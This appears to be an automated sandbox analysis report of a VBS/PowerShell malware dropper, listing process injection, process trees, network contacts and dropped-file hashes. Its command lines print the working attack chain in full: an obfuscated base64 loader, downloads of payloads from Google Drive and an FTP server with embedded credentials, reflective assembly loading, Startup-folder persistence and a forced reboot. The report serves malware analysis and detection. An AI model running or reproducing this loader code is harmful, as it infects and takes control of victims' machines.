Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4032 wrote to memory of 3928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4032 wrote to memory of 3928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 1432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\cmd.exe
PID 4972 wrote to memory of 1432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\cmd.exe
PID 4972 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4972 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\cmd.exe
PID 4972 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\cmd.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1592 wrote to memory of 4188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革DEЌз革ZQB1Ќз革HIЌз革dЌз革Ќз革nЌз革CЌз革Ќз革LЌз革Ќз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革CЌз革Ќз革LЌз革Ќз革gЌз革CcЌз革aЌз革B0Ќз革HQЌз革cЌз革BzЌз革DoЌз革LwЌз革vЌз革G0Ќз革ZQBoЌз革HIЌз革ZQBlЌз革G4Ќз革YwByЌз革GUЌз革YQB0Ќз革GkЌз革bwBuЌз革C4Ќз革YwBvЌз革G0Ќз革LwBpЌз革G4Ќз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革WgBjЌз革EIЌз革YwBhЌз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HIЌз革dwBjЌз革GwЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAARgBkAE0AUQBUACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAARgBkAE0AUQBUACQAIAA7AA==';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs');powershell $IedxR

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lcwr.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $lcwr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lcwr.dispose();$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $lcwr.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ni/moc.noitaercneerhem//:sptth' , $hzwje , 'true1' ) );};"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\iocpf.ps1"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4188 -ip 4188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 620

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 ftp.desckvbrat.com.br udp
BR 191.252.83.213:21 ftp.desckvbrat.com.br tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 213.83.252.191.in-addr.arpa udp
BR 191.252.83.213:60545 ftp.desckvbrat.com.br tcp
US 8.8.8.8:53 api.pastecode.io udp
US 172.67.177.136:443 api.pastecode.io tcp
US 8.8.8.8:53 136.177.67.172.in-addr.arpa udp
BR 191.252.83.213:60100 ftp.desckvbrat.com.br tcp
US 8.8.8.8:53 mehreencreation.com udp
IN 180.149.241.246:443 mehreencreation.com tcp
US 8.8.8.8:53 246.241.149.180.in-addr.arpa udp
BR 191.252.83.213:60842 ftp.desckvbrat.com.br tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 59.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/3928-0-0x00007FFAF38B3000-0x00007FFAF38B5000-memory.dmp

memory/3928-1-0x00000260EA660000-0x00000260EA682000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1fuoo4f.ogx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3928-11-0x00007FFAF38B0000-0x00007FFAF4371000-memory.dmp

memory/3928-12-0x00007FFAF38B0000-0x00007FFAF4371000-memory.dmp

memory/4972-22-0x000001E517D60000-0x000001E517D6A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

MD5 9bd56f14a581eeb900023c9c0a442aec
SHA1 af4d5c929bcaa109a37cc710f3b9b4af7d17da7e
SHA256 4b9a9f753c2523359e1465246f8632710877b938493d6a2e0c377deafe914cce
SHA512 bb75624f826e3ab2d16620028393f943d8b421ebf1969020421532133aa134decf9cf27dbd68555b94c64cd694c67b602f228c835fbf758f87f12601e5a3926e

memory/3928-36-0x00007FFAF38B3000-0x00007FFAF38B5000-memory.dmp

memory/3928-37-0x00007FFAF38B0000-0x00007FFAF4371000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7d5d8cf9f65ce79e552409c240295219
SHA1 ec5e938110638dcd176ce0645682a0d3949dd5a8
SHA256 817d6bfa16b959aae0dec64568ec6d98fdd61a205c61dde60551e192e5478596
SHA512 0d06c42b9c5648311000eefe9bd5a952dafd999b5c7ab17dbbebb6c6d9cd4b1de451e13ef0af72dfa3557aee8cb8bb5521642db843c3f61dfd701dd6c95afb68

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a1e249212d4af8ee7f335a5dfd075ba
